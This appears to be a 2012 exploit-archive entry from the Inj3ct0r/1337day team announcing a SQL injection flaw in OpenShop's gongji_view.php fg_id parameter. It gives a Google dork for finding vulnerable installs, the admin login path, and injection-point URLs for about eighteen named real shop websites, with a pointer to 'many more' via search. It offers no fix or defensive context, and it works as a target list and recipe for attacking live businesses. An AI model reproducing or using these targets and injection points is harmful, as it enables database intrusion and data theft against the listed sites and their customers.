OpenShop - SQL Injection Vulnerability



EKU-ID: 1652 CVE: OSVDB-ID:
Author: TheCyberNuxbie Published: 2012-03-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Official Website: http://www.1337day.com                        0
1  [+] Support E-mail  : mr.inj3ct0r[at]gmail.com                      1
0                                                                      0
1                ##########################################            1
0                I'm NuxbieCyber Member From Inj3ct0r Team             1
1                ##########################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

========================================================================
|||              OpenShop - SQL Injection Vulnerability              |||
========================================================================

- Discovered By:
||| TheCyberNuxbie - Independent Security Research |||
<<< staff@thecybernuxbie.com >>> CP: +62856-2538-963

- Info WebApps:
This Content Develop By:
http://www.openshop.co.nz/

- Google Dork:
inurl:"/gongji_view.php?fg_id="

- Exploit Report:
http://lokalisasi/WebApps/gongji_view.php?fg_id=[SQL Injection]

- Private Area:
http://lokalisasi/WebApps/admin/login.php <--- LogIn Area...!!!

- Sample WebApps Vuln SQLi:
http://lovecast.co.nz/shop/gongji_view.php?fg_id=35' + [SQL Injection]
http://momdadme.com/gongji_view.php?fg_id=13' + [SQL Injection]
http://joongboomarket.com/gongji_view.php?fg_id=6' + [SQL Injection]
http://artformmannequins.co.nz/shop/gongji_view.php?fg_id=10' + [SQL Injection]
http://moonshinart.com/mall/gongji_view.php?fg_id=17' + [SQL Injection]
http://industrial-lubricants.co.nz/shop/gongji_view.php?fg_id=11' + [SQL Injection]
http://english.bros.co.kr/shop/gongji_view.php?fg_id=3' + [SQL Injection]
http://funtoys.co.nz/gongji_view.php?fg_id=26' + [SQL Injection]
http://safensound.co.nz/gongji_view.php?fg_id=25' + [SQL Injection]
http://ruby-doo.co.nz/gongji_view.php?fg_id=22' + [SQL Injection]
http://wigplus.com/gongji_view.php?fg_id=1' + [SQL Injection]
http://kimsresalefurniture.com/gongji_view.php?fg_id=4' + [SQL Injection]
http://edsys.co.kr/mall/gongji_view.php?fg_id=11' + [SQL Injection]
http://tokeimall.com/gongji_view.php?fg_id=9' + [SQL Injection]
http://jinsungdiary.com/mall/gongji_view.php?fg_id=33' + [SQL Injection]
http://curatoredu.co.kr/mall/gongji_view.php?fg_id=32' + [SQL Injection]
http://designerliving.co.nz/shop/gongji_view.php?fg_id=8' + [SQL Injection]
http://88fishing.co.kr/gongji_view.php?fg_id=88' + [SQL Injection]
, And Many More @ Google...!!!

- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...

- Special Thanks:
Alloh SWT (GOD)
Mama & Papa,,,
All My Friends,,,

[ Inj3ct0r - Exploit-DB - PacketStormSecurity ]

Me @ Solo Raya, 12 March 2012 | 11:47 PM. Central Java, Indonesian.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$